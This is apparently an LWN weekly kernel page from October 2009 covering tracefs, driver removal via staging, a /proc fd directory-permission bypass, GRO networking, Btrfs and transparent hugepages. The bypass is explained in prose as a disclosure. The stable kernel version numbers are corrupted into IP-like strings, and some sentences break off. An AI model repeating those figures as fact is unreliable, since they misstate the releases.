The current development kernel remains 2.6.32-rc5
; no 2.6.32
prepatches have been released over the last week.
The current stable kernel is 22.214.171.124, released (along with 126.96.36.199) on October 22.
The 2.6.27 update is relatively small and focused on SCSI and USB serial
devices; the 2.6.31 update, instead, addresses a much wider range of
Comments (none posted)
It would be possible for us to rescan the RMRR tables when we take
a device out of the si_domain, if we _really_ have to. But I'm
going to want a strand of hair from the engineer responsible for
that design, for my voodoo doll.
-- David Woodhouse
If a software system is so complex that its quirks and pitfalls
cannot easily be located and avoided (witness the ondemand
scheduler problem on Pentium IV's message I recently filed) then
is it not *effectively* open source. I am qualified to read
hardware manuals, I am qualified to rewrite C code (having written
code generators for several C compilers) but the LKML is like the
windmill and I feel like Don Quixote tilting back and forth in
front of it. One could even argue that the lack of an open bug
reporting system (and "current state" online reports) effectively
makes Linux a non-open-source system. Should not Linux be the one
of the first systems to make all knowledge completely available?
Or is it doomed to be replaced by systems which might provide such
capabilities (Android perhaps???)
-- Robert Bradbury
A real git tree will contain fixes for brown paperbag bugs, it will
contain reverts, it will contain the occasional messy changelog. It
is also, because it's more real life, far more trustable to pull
from. The thing is, nothing improves a workflow more than public
embarrassment - but rebasing takes away much of that public
-- Ingo Molnar
Comments (3 posted)
The release of Windows 7 happened to coincide with the Japan Linux Symposium in Tokyo. Linus Torvalds was clearly quite impressed - and Chris Schlaeger was there to capture the moment. The original picture is available over here
See also: Len Brown's photos from the kernel summit and JLS.
Comments (20 posted)
In-kernel tracing is rapidly becoming a feature that developers and users
count on. In current kernels, though, the virtual files used to control
tracing and access data are all found in the debugfs filesystem, in the
directory. That is not seen as a long-term solution;
debugfs is meant for volatile, debugging information, but tracing users
want to see a stable ABI in a non-debugging location.
Following up on some conference discussions, Greg Kroah-Hartman decided to
regularize the tracing file hierarchy through the creation of a new tracefs virtual filesystem.
Tracefs looks a lot like .../debug/tracing in that the files have
simply been moved from one location to the other. Tracefs has a simpler
internal API, though, since it does not require all of the features
supported by debugfs.
The idea of tracefs is universally supported, but this particular patch
looks like it will not be going in anytime soon. The concern is that
anything moved out of debugfs and into something more stable will instantly
become part of the kernel ABI. Much of the current tracing interface has
been thrown together to meet immediate needs; the sort of longer-term
thinking which is needed to define an interface which can remain stable for
years is just beginning to happen.
Ingo Molnar thinks that the virtual files
which describe the available events could be exported now, but not much
else. That leaves most of the interface in an unstable state, still. So
Greg has withdrawn the patch for now;
expect it to come back with the tracing developers are more ready to commit
to their ABI. At that point, we can expect the debate to begin on the
truly important question: /tracing or
Comments (1 posted)
The staging tree was conceived as a way for substandard drivers to get into
the kernel tree. Recently, though, there has been talk of using staging to
ease drivers out as well. The idea is that apparently unused and unloved
drivers would be moved to the staging tree, where they will languish for
three development cycles. If nobody has stepped up to maintain those
drivers during that time, they will be removed from the tree. This idea
was discussed at the 2009 Kernel Summit with no serious dissent.
Since then, John Linville has decided to test the system with a series of
ancient wireless drivers. These include the "strip" driver ("STRIP
is a radio protocol developed for the MosquitoNet project - to send
Internet traffic using Metricom radios."), along with the arlan,
netwave, and wavelan drivers. Nobody seems to care about this code, and it
is unlikely that any users remain. If that is true, then there should be
no down side to removing the code.
That hasn't stopped the complaints, though, mostly from people who believe
that staging drivers out of the tree is an abuse of the process which may
hurt unsuspecting users. It is true that users may have a hard time
noticing this change until the drivers are actually gone - though their
distributors may drop them before the mainline does. So the potential for
an unpleasant surprise is there; mistaken removals are easily reverted, but
that is only partially comforting for a user whose system has just broken.
The problem here is that there is no other way to get old code out of the
tree. Once upon a time, API changes would cause unmaintained code to fail
to compile; after an extended period of brokenness, a driver could be
safely removed. Contemporary mores require developers to fix all in-tree
users of an API they change, though, so this particular indicator no longer
exists. That means the tree can fill up with code which is unused and
which has long since ceased to work, but which still compiles flawlessly.
Somehow a way needs to be found to remove that code. The "staging out"
process may not be perfect, but nobody has posted a better idea yet.
Comments (16 posted)
In a discussion of the O_NODE
open flag patch, an interesting, though obscure, security hole came to
light. Jamie Lokier noticed the problem,
and Pavel Machek eventually posted it to the
Bugtraq security mailing list.
Normally, one would expect that a file in a
directory with 700 permissions would be inaccessible to all but the owner of
the directory (and root, of course). Lokier and Machek showed that there
is a way around that restriction by using an entry in an attacking process's
fd directory in the /proc filesystem.
If the directory
is open to the attacker at some time, while the file is present, the
attacker can open the file for reading and hold it open even if the victim
directory permissions. Any normal write to the open file descriptor will
fail because it was opened read-only, but writing to
/proc/$$/fd/N, where N is the open file
descriptor number, will succeed based on the permissions of the
file. If the file allows the attacking process to write to it,
writing to the /proc file will succeed regardless of the
permissions of the parent directory.
This is rather counter-intuitive, and,
even though it is a rather contrived example, seems to constitute a
The Bugtraq thread got off course quickly, by noting that a similar effect
could be achieved creating a hardlink to the file before the directory
permissions were changed. While that is true, Machek's example looked for
that case by checking the link count on the file after the directory
permissions had been changed. The hardlink scenario would be detected at that
One can imagine situations where programs do not put the right permissions
on the files they use and administrators attempt to work around that
problem by restricting access to the parent directory. Using this
technique, an attacker could still access those files, in a way that was
difficult to detect. As Machek noted, unmounting the /proc
filesystem removes the problem, but "I do not think mounting /proc
should change access control semantics."
There is currently some discussion of how,
and to some extent whether, to address the problem, but a consensus (and
patch) has not yet emerged.
Comments (12 posted)
Kernel development news
Your editor still remembers installing his first Ethernet adapter. Through
the expenditure of massive engineering resources, DEC was able to squeeze
this device onto a linked pair of UNIBUS boards - the better part of a
square meter of board space in total - so that a VAX system could be put
onto a modern network. Supporting 10Mb/sec was a bit of a challenge in
those days. In the intervening years, leading-edge network adaptors have
sped up to 10Gb/sec - a full three orders of magnitude. Supporting them is
a challenge, though for different reasons. At the 2009 Japan
Linux Symposium, Herbert Xu discussed those challenges and how Linux has
evolved to meet them.
Part of the problem is that 10G Ethernet is still Ethernet underneath.
There is value in that; it minimizes the changes required in other parts of
the system. But it's an old technology which brings some heavy baggage
with it, with the heaviest bag of all being the 1500-byte maximum transfer
unit (MTU) limit. With packet size capped at 1500 bytes, a 10G network
link running at full speed will be transferring over 800,000 packets per
second. Again, that's an increase of three orders of magnitude from the
10Mb days, but CPUs have not kept pace. So the amount of CPU time
available to process a single Ethernet packet is less than it was in the
early days. Needless to say, that is putting some pressure on the
networking subsystem; the amount of CPU time required to process each
packet must be squeezed wherever possible.
(Some may quibble that, while individual CPU speeds have not kept pace, the
number of cores has grown to make up the difference. That is true, but the
focus of Herbert's talk was single-CPU performance for a couple of reasons:
any performance work must benefit uniprocessor systems, and distributing a
single adapter's work across multiple CPUs has its own challenges.)
Given the importance of per-packet overhead, one might well ask whether it
makes sense to raise the MTU. That can be done; the "jumbo frames"
mechanism can handle packets up to 9KB in size. The problem, according to
Herbert, is that "the Internet happened." Most connections of interest go
across the Internet, and those are all bound by the lowest MTU in the
entire path. Sometimes that MTU is even less than 1500 bytes.
Protocol-based mechanisms for finding out what that MTU is exist, but they
don't work well on the Internet; in particular, a lot of firewall setups
break it. So, while jumbo frames might work well for local networks, the
sad fact is that we're stuck with 1500 bytes on the wider Internet.
If we can't use a larger MTU, we can go for the next-best thing: pretend
that we're using a larger MTU. For a few years now Linux has supported
network adapters which perform "TCP segmentation offload," or TSO. With a
TSO-capable adapter, the kernel can prepare much larger packets (64KB, say)
for outgoing data; the adapter will then re-segment the data into smaller
packets as the data hits the wire. That cuts the kernel's per-packet
overhead by a factor of 40. TSO is well supported in Linux; for systems
which are engaged mainly in the sending of data, it's sufficient to make
10GB work at full speed.
The kernel actually has a generic segmentation offload mechanism (called
GSO) which is not limited to TCP. It turns out that performance improves
even if the feature is emulated in the driver. But GSO only works for data
transmission, not reception. That limitation is entirely fine for broad
classes of users; sites providing content to the net, for example, send far
more data than they receive. But other sites have different workloads,
and, for them, packet reception overhead is just as important as
Solutions on the receive side have been a little slower in coming, and not
just because the first users were more interested in transmission
performance. Optimizing the receive side is harder because packet
reception is, in general, harder. When it is transmitting data, the kernel
is in complete control and able to throttle sending processes if
necessary. But incoming packets are entirely asynchronous events, under
somebody else's control, and the kernel just has to cope with what it gets.
Still, a solution has emerged in the form of "large receive offload" (LRO),
which takes a very similar approach: incoming packets are merged at
reception time so that the operating system sees far fewer of them. This
merging can be done either in the driver or in the hardware; even LRO
emulation in the driver has performance benefits. LRO is widely supported
by 10G drivers under Linux.
But LRO is a bit of a flawed solution, according to Herbert; the real
problem is that it "merges everything in sight." This transformation is
lossy; if there are important differences between the headers in incoming
packets, those differences will be lost. And that breaks things. If a
system is serving as a router, it really should not be changing the headers
on packets as they pass through. LRO can totally break satellite-based
connections, where some very strange header tricks are done by providers to
make the whole thing work. And bridging breaks, which is a serious
problem: most virtualization setups use a virtual network bridge between
the host and its clients. One might simply avoid using LRO in such
situations, but these also tend to be the workloads that one really wants
to optimize. Virtualized networking, in particular, is already slower; any
possible optimization in this area is much needed.
The solution is generic receive offload (GRO).
In GRO, the criteria for which packets can be merged is greatly
restricted; the MAC headers must be identical and only a few TCP or IP
headers can differ. In fact, the set of headers which can differ is
severely restricted: checksums are necessarily different, and the IP ID
field is allowed to increment. Even the TCP timestamps must be identical,
which is less of a restriction than it may seem; the timestamp is a
relatively low-resolution field, so it's not uncommon for lots of packets
to have the same timestamp. As a result of these restrictions, merged
packets can be resegmented losslessly; as an added benefit, the GSO code
can be used to perform resegmentation.
One other nice thing about GRO is that, unlike LRO, it is not limited to
The GRO code was merged for 2.6.29, and it is supported by a number of 10G
drivers. The conversion of drivers to GRO is quite simple. The biggest
problem, perhaps, is with new drivers which are written to use the LRO API
instead. To head this off, the LRO API may eventually be removed, once the
networking developers are convinced that GRO is fully functional with no
remaining performance regressions.
In response to questions, Herbert said that there has not been a lot of
effort toward using LRO in 1G drivers. In general, current CPUs can keep
up with a 1G data stream without too much trouble. There might be a
benefit, though, in embedded systems which typically have slower
processors. How does the kernel decide how long to wait for incoming
packets before merging them? It turns out that there is no real need for
any special waiting code: the NAPI API already has the driver polling for
new packets occasionally and processing them in batches. GRO can simply be
performed at NAPI poll time.
The next step may be toward "generic flow-based merging"; it may also be
possible to start merging unrelated packets headed to the same destination
to make larger routing units. UDP merging is on the list of things to do.
There may even be a benefit in merging TCP ACK packets. Those packets are
small, but there are a lot of them - typically one for every two data
packets going the other direction. This technology may go in surprising
directions, but one thing is clear: the networking developers are not short
of ideas for enabling Linux to keep up with ever-faster hardware.
Comments (23 posted)
Conferences can be a good opportunity to catch up with the state of ongoing
projects. Even a detailed reading of the relevant mailing lists will not
always shed light on what the developers are planning to do next, but a
public presentation can inspire them to set out what they have in mind.
Chris Mason's Btrfs talk at the Japan Linux Symposium was a good example of
such a talk.
The Btrfs filesystem was merged for the 2.6.29 kernel, mostly as a way to encourage wider
testing and development. It is certainly not meant for production use at
this time. That said, there are people doing serious work on top of Btrfs;
it is getting to where it is stable enough for daring users. Current Btrfs
includes an all-caps warning in the Kconfig file stating that the
disk format has not yet been stabilized; Chris is planning to remove that
warning, perhaps for the 2.6.33 release. Btrfs, in other words, is
One relatively recent addition is full use of zlib compression. Online
resizing and defragmentation are coming along nicely. There has also been
some work aimed at making synchronous I/O operations work well.
Defragmentation in Btrfs is easy: any specific file can be defragmented by
simply reading it and writing it back. Since Btrfs is a copy-on-write
filesystem, this rewrite will create a new copy of the file's data which
will be as contiguous as the filesystem is able to make it. This approach
can also be used to control the layout of files on the filesystem. As an
experiment, Chris took a bunch of boot-tracing data from a Moblin system
and analyzed it to figure out which files were accessed, and in which
order. He then rewrote the files in question to put them all in the same
part of the disk. The result was a halving of the I/O time during boot,
resulting in a faster system initialization and smiles all around.
Performance of synchronous operations has been an important issue over the
last year. On filesystems like ext3, an fsync() call will flush
out a lot of data which is not related to the actual file involved; that
adds a significant performance penalty for fsync() use and
discourages careful programming. Btrfs has improved the situation by
creating an entirely separate Btree on each filesystem which is used for
synchronous I/O operations. That tree is managed identically to, but
separately from, the regular filesystem tree. When an fsync()
call comes along, Btrfs can use this tree to only force out operations for
the specific file involved. That gives a major performance win over ext3
A further improvement would be the ability to write a set of files, then
all out in a single operation. Btrfs could do that, but there's no way in
POSIX to tell the kernel to flush multiple files at once. Fixing that is
likely to involve a new system call.
Btrfs provides a number of features which are also available via the device
mapper and MD subsystems; some people have wondered if this duplication of
features makes sense. But there are some good reasons for it; Chris gave a
couple of examples:
- Doing snapshots at the device mapper/LVM layer involves making a lot
more copies of the relevant data. Chris ran an experiment where he
created a 400MB file, created a bunch of snapshots, then overwrote the
file. Btrfs is able to just write the new version, while allowing all
of the snapshots to share the old copy. LVM, instead, copies the data
once for each snapshot. So this test, which ran in less than two
seconds on Btrfs, took about ten minutes with LVM.
- Anybody who has had to replace a drive in a RAID array knows that the
rebuild process can be long and painful. While all of that data is
being copied, the array runs slowly and does not provide the usual
protections. The advantage of running RAID within Btrfs is that the
filesystem knows which blocks contain useful data and which do not.
So, while an MD-based RAID array must copy an entire drive's worth of
data, Btrfs can get by without copying unused blocks.
So what does the future hold? Chris says that the 2.6.32 kernel will
include a version of Btrfs which is stable enough for early adopters to
play with. In 2.6.33, with any luck, the filesystem will have RAID4 and
RAID5 support. Things will then stabilize further for 2.6.34. Chris was
typically cagey when talking about production use, though, pointing out
that it always takes a number of years to develop complete confidence in a
new filesystem. So, while those of us with curiosity, courage, and good
backups could maybe be making regular use of Btrfs within a year,
widespread adoption is likely to be rather farther away than that.
Comments (54 posted)
Most Linux systems divide memory into 4096-byte pages; for the bulk of the
memory management code, that is the smallest unit of memory which can be
manipulated. 4KB is an increase over what early virtual memory systems
used; 512 bytes was once common. But it is still small relative to the
both the amount of physical memory available on contemporary systems and
the working set size of applications running on those systems. That means
that the operating system has more pages to manage than it did some years
Most current processors can work with pages larger than 4KB. There are
advantages to using larger pages: the size of page tables decreases, as
does the number of page faults required to get an application into RAM.
There is also a significant performance advantage that derives from the
fact that large pages require fewer translation lookaside buffer (TLB)
slots. These slots are a highly contended resource on most systems;
reducing TLB misses can improve performance considerably for a number of
There are also disadvantages to using larger pages. The amount of wasted
memory will increase as a result of internal fragmentation; extra data
dragged around with sparsely-accessed memory can also be costly. Larger
pages take longer to transfer from secondary storage, increasing page fault
latency (while decreasing page fault counts). The time required to simply
clear very large pages can create significant kernel latencies. For all of
these reasons, operating systems have generally stuck to smaller pages.
Besides, having a single, small page size simply works and has the benefit
of many years of experience.
There are exceptions, though. The mapping of kernel virtual memory is done
with huge pages. And, for user space, there is "hugetlbfs," which can be
used to create and use large pages for anonymous data. Hugetlbfs was added
to satisfy an immediate need felt by large database management systems,
which use large memory arrays. It is narrowly aimed at a small number of
use cases, and comes with significant limitations: huge pages must be
reserved ahead of time, cannot transparently fall back to smaller pages,
are locked into memory, and must be set up via a special API. That worked
well as long as the only user was a certain proprietary database manager.
But there is increasing interest in using large pages elsewhere;
virtualization, in particular, seems to be creating a new set of demands
for this feature.
A host setting up memory ranges for virtualized guests would like to be
able to use large pages for that purpose. But if large pages are not
available, the system should simply fall back to using lots of smaller
pages. It should be possible to swap large pages when needed. And the
virtualized guest should not need to know anything about the use of large
pages by the host. In other words, it would be nice if the Linux memory
management code handled large pages just like normal pages. But that is
not how things happen now; hugetlbfs is, for all practical purposes, a
separate, parallel memory management subsystem.
Andrea Arcangeli has posted a
transparent hugepage patch which attempts to remedy this situation by
removing the disconnect between large pages and the regular Linux virtual
memory subsystem. His goals are fairly ambitious: he would like an
application to be able to request large pages with a simple
madvise() system call. If large pages are available, the system
will provide them to the application in response to page faults; if not,
smaller pages will be used.
Beyond that, the patch makes large pages swappable. That is not as easy as
it sounds; the swap subsystem is not currently able to deal with memory in
anything other than PAGE_SIZE units. So swapping out a large page
requires splitting it into its component parts first. This feature works,
but not everybody agrees that it's worthwhile. Christoph Lameter commented that workloads which are
performance-sensitive go out of their way to avoid swapping anyway, but
that may become less true on a host filling up with virtualized guests.
A future feature is transparent reassembly of large pages. If such a page
has been split (or simply could not be allocated in the first place), the
application will have a number of smaller pages scattered in memory.
Should a large page become available, it would be nice if the memory
management code would notice and migrate those small pages into one large
page. This could, potentially, even happen for applications which have
never requested large pages at all; the kernel would just provide them by
default whenever it seemed to make sense. That would make large pages
truly transparent and, perhaps, decrease system memory fragmentation at the
This is an ambitious patch to the core of the Linux kernel, so it is
perhaps amusing that the chief complaint seems to be that it does not go
far enough. Modern x86 processors can support a number of page sizes, up
to a massive 1GB. Andrea's patch is currently aiming for the use of 2MB
pages, though - quite a bit smaller. The reasoning is simple: 1GB pages
are an unwieldy unit of memory to work with. No Linux system that has been
running for any period of time will have that much contiguous memory lying
around, and the latency involved with operations like clearing pages would
be severe. But Andi Kleen thinks this approach
is short-sighted; today's massive chunk of memory is tomorrow's brief
email. Andi would rather that the system not be designed around today's
limitations; for the moment, no agreement has been reached on that point.
In any case, this patch is an early RFC; it's not headed toward the
mainline in the near future. It's clearly something that Linux needs,
though; making full use of the processor's capabilities requires treating
large pages as first-class memory-management objects. Eventually we should
all be using large pages - though we may not know it.
Comments (12 posted)
Patches and updates
Core kernel code
- Greg KH: tracefs .
(October 23, 2009)
Filesystems and block I/O
Virtualization and containers
Page editor: Jonathan Corbet
Next page: Distributions>>